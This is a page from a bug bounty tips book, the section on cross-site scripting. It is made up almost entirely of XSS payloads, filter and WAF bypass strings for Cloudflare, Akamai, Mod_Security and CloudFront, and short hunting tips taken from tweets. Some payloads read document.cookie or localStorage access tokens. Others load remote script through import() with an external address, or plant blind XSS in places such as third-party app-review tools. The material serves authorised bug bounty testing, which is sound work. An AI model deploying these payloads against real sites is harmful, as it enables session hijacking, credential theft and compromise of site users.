Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

Cross Site Scripting (XSS)

PreviousSensitive Information DisclosureNextCRLF

Last updated 1 month ago

  • .

  • Target[.]com/index.php?xss=<a href=x onfocus=alert(23) name=jj>

  • Blind xss

Payloads

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed cloud flare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
 "><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
 XSS
<body ontouchstart=alert(1)>
Triggers when a finger touch the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
When a finger is dragged across the screen.
$` onerror=alert(1);//
" onfocus="alert(1)" autofocus="

<math><x xlink:href=javascript:confirm`1`>click

HTML INJECTION + XSS INJECTION 

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
#BugBounty  #bugbountytip

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

Good luck!

xss payload + &NewLine;

<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>

<img src="X" onerror=top[8680439..toString(30)](1337)>

<input onfocus="alert('xss');" autofocus>

#BugBountyTip - Useful #XSS Payloads. Today I used this:
< a href="mailto:a"+/onmouseover=prompt(document.domain)>

Data URI -

Self XSS to Stored XSS
If you find jsp page with no parameters. You can actually add path parameters using semicolon Like this http://example.com/test.jsp ;');alert(1)// & perform XSS. Apache tomcat support this. #Bugbountytip #BugBounty #XSS
Bug bounty tip: put a blind XSS payload in your user agent before you fill in a contact form. ;-)
bugbountytip If you get a reflected XSS so that you can only add attributes to a hidden field, DON'T settle for accessKey XSS. Check the JavaScript in the page for any sort of document.getElementById("x").click() functions. If you can get your input to have that ID: ALERT XD
bugbounty #bugbountytip #bugbountytips Sometimes user input is reflected into a value without any quotations. Eg: Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().
An useful XSS filter bypass technique I use when everything is not working is to take the closing tag off eg. hhh<img src="#" onmouseenter="prompt('XSS')" gggg
Testing a shopping site; Try the XSS payload in order ID parameter once you order an item rather than just an IDOR. They forget to sanitize there coz they are meant to be just numbers ;) #bugbountyTips #XSS
While looking on .js files, try identify the weak places in code. Like, innerHTML indicates there might be XSS.
If you find jsp page with no parameters. You can actually add path parameters using semicolon Like this http://example.com/test.jsp ;');alert(1)// & perform XSS. Apache tomcat support this.
tip for blind xss :- inject bxss payloads in appstore/play store’s app reviews. Many times companies uses third party app review analysis apps. Payload can get trigger on the third party app which can give you access to some sensitive information.
XSS through open redirect - /x:1/:///%01javascript:alert(document.cookie)/
#bugbountytip You can turn an input box into automatic #XSS by setting agnostic payload on the "onfocus" attribute and then setting it to "autofocus". Eg: <input onfocus="alert(0);" autofocus> This will result in automatic XSS (no user interaction).
Use <svg onload=alert(1)> payload as file extension. When extension reflects in html. Sometime developers validate filename and forgot to validate extension.
#bugbountytip Here is a #XSS polyglot: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Split your XSS payload into two like for ex. FName: <img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS
#bugbounty tip: to demonstrate XSS impact, don't use alert('alert'). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem('access_token'))
I found an endpoint without extension and parameters. response was json. added .html and a parameter with xss payload, resulted in html with xss try it. #bugbounty
When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code
https://twitter.com/dirtycoder0124/status/1162927865542762496
There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;)
@kunalp94: If you got unvalidated redirect issue, don't just submit it yet, try to trigger reflective XSS, it'll make report more interesting. My favourite payload is javascript://%0aalert(1) or javascript://%250aalert(1) in case of double encoding. :)#bugbounty #hackerone
I just had to break out of a comment to cause XSS during a pentest, if you guys come across this issue try this : --!><Svg/Onload=confirm(document.domain)> it worked for me in this case. #bugbounty #pentesting
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16
if you google ".xss.ht" you can find where others are testing and maybe reveal some priv programs. :P
Have you ever come across an issue, where you could pop XSS but parenthesis () gets filtered ? this payload "onfocus="alert1"autofocus=" will bypass that problem #BugBounty #bugbountytip
If you have stored HTML injection in the tag of a page (fairly common with Web Cache Poisoning), you can DOS the page's scripts by inserting a malicious CSP via the meta tag. Sometimes you can even inject into a meta tag in the header and just use the " to escape.
Here's an interesting #bugbountytip: You can bypass a lot of #XSS filters using HTML comments. They bypass it because they don't look/act like other tags. You can sometimes insert additional HTML too. Example: <!----><script>alert(0);</script> #infosec #CyberSecrurity #BugBounty
We all know about '-alert-' and ';alert();' but I figured out some alternatives by fuzzing the latest Firefox.
'^alert()^' 'alert()' '/alert()/'
https://twitter.com/B1ueB0ne/status/1091538912235769856
Assume, the server filter ) and you want to bypass it then use: "-alert`1`," E.g window.location.replace("http://site.com/?x=3"); window.location.replace("http://site.com/?x=3"-alert`1`,") will do the trick.
#BugBounty #BugBountyTips #XSS If the program replace all user input in the tag (ex: <h1>,<script>,etc.) into blank you can add "Line Feed (%0a)" before closing tag for bypass (ex: <script%0a>,</h1%0a>)
#bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced
CloudFront bypass: Worked on a public program today ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> Would be interested to know if this is target specific or other CloudFront websites are vulnerable #bugbountytip #xs
s
Recently discovered login XSS filter bypass: Input: "<> onmouseover="hack() Reflection: <a class="login-link v-button" href="https://site.com/test"&lt;&gt; "hack()">Log in * <,>, on* => Filtered * " => Not Filtered Bypass: ononmouseover=mouseover=onmouseover="alert()
If you find HTML injection or a triager claims you cant execute Open-Redirect inside a web-page without javascript, Use this payload: ><meta http-equiv="Refresh" content="0; url='https://naglinagli.github.io'" /> #bugbountytips #BugBounty
Multi-context XSS polyglot " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// by@avlidienbrunn
https://twitter.com/Bugcrowd/status/1339417608169222145?s=20